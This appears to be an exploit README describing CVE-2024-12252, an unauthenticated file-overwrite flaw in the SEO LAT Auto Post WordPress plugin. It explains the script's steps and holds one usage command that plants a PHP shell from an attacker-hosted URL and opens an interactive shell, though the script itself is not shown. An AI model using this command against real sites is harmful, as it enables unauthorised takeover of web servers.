Share
## https://sploitus.com/exploit?id=208B5BD1-1027-558E-9DD5-88CF39371D67
# SEO LAT Auto Post <= 2.2.1 - Remote Code Execution

## Description

The SEO LAT Auto Post plugin for WordPress is vulnerable to file overwrite due to a missing capability check on the `remote_update` AJAX action in all versions up to, and including, 2.2.1. This makes it possible for unauthenticated attackers to overwrite the `seo-beginner-auto-post.php` file which can be leveraged to achieve remote code execution.

## Vulnerability Details

- **CVE**: CVE-2024-12252
- **CVSS Score**: 9.8 (Critical)

## Exploitation

This script exploits the vulnerability in the SEO LAT Auto Post plugin to achieve remote code execution by overwriting the `seo-beginner-auto-post.php` file. The script automates the process of checking the plugin version, triggering the exploit, and providing an interactive shell for executing commands.

## Usage
    
```plaintext
usage: CVE-2024-12252.py [-h] -u URL --attack-url ATTACK_URL

CVE-2024-12252 | SEO LAT Auto Post <= 2.2.1 - Remote Code Execution # by: By Nxploit | Khaled Alenazi

options:
-h, --help            show this help message and exit
-u, --url URL         Target base URL (e.g., http://example.com/wordpress)
--attack-url ATTACK_URL
                      Direct URL to your malicious PHP shell
```

Run the script with the target URL and the URL to your malicious PHP shell:
```sh
python CVE-2024-12252.py -u http://example.com/wordpress --attack-url http://yourserver.com/shell.php
```

## References

- [Wordfence Intelligence](https://www.wordfence.com/)
- [CVE-2024-12252](https://vulners.com/cve/CVE-2024-12252)